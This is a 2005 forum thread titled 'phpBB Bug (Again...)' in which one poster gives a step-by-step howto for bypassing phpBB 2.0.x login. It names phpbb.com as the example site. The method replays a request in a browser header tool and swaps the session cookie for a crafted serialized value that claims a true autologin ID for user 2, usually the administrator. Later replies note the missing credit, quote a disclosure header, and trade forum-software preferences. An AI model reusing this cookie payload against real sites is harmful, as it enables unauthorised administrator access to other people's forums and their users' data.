Author Topic: phpBB Bug (Again...) (Read 3555 times)

Networks · « **on:** March 25, 2005, 06:30:54 pm »

Quote

Ok, now let's get to it. Here is what you will need:
-Preferably a mozilla client, such as Firefox
-LiveHTTP Headers plugin for FireFox Here

Ok, the way this exploit works is because in phpBB's session file, it utilizes a == instead of a === on autocheckid return, allowing you to use a true boolean. I don't know if this was a typo, but to me I think it was a pretty stupid fuck up by phpBB and I am suprised it wasn't found earlier.

Howto:
Go to a forum, for example phpBB.com, open the forum index then go into tools > Live HTTP Headers > then click reload. Once the page is reloaded, go into Live HTTP Headers window, scroll all the way to the top where the first packet is. Then click replay. ScreenShot

In the packet will be thefollowing data
Code:
Host: www.phpbb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: phpbb2support_data=a%3A0%3A%7B%7D

On this line
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
Replace the a%3A0%3A%7B%7D with
Code:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

and then click "reload".

after the page has reloaded you should be logged in a user number 2 , which is usually the administrators id number.

I myself have tried it several times, I have not succeeded in getting an admin status so blah.

Edit: PHPBB 2.0.12 Exploit (That may be why)

iago · « **Reply #1 on:** March 25, 2005, 06:33:08 pm »

Eww @ not giving credit

------------------------------------------------------------------------
# phpBB 2.0.13 failure to reset user level after failed exploit
# discovered By : tOnk3r
# e-mail : m[at]spywire[dot]net
# date : 22-march-05
# shouts: pureone, spywire.net crew , and everybody i know!
# Versions affected : ALL versions upto and including 2.0.13
# status : vendor notified (phpbb)
------------------------------------------------------------------------

Hoepfully they fix that fast :-o

Quik · « **Reply #2 on:** March 25, 2005, 06:39:55 pm »

It's quite rediculous: I've seen so many phpBB exploits on BugTraq mailing list, it's a wonder anyone uses that software.

Newby · « **Reply #3 on:** March 25, 2005, 06:43:37 pm »

SMF for life!

Networks · « **Reply #4 on:** March 26, 2005, 01:46:41 am »

Quote from: Newby on March 25, 2005, 06:43:37 pm

SMF for life!

Wrong, Invision for life!

Clan x86

News:

Author Topic: phpBB Bug (Again...) (Read 3555 times)

Networks

phpBB Bug (Again...)

iago

Re: phpBB Bug (Again...)

Quik

Re: phpBB Bug (Again...)

Newby

Re: phpBB Bug (Again...)

Networks

Re: phpBB Bug (Again...)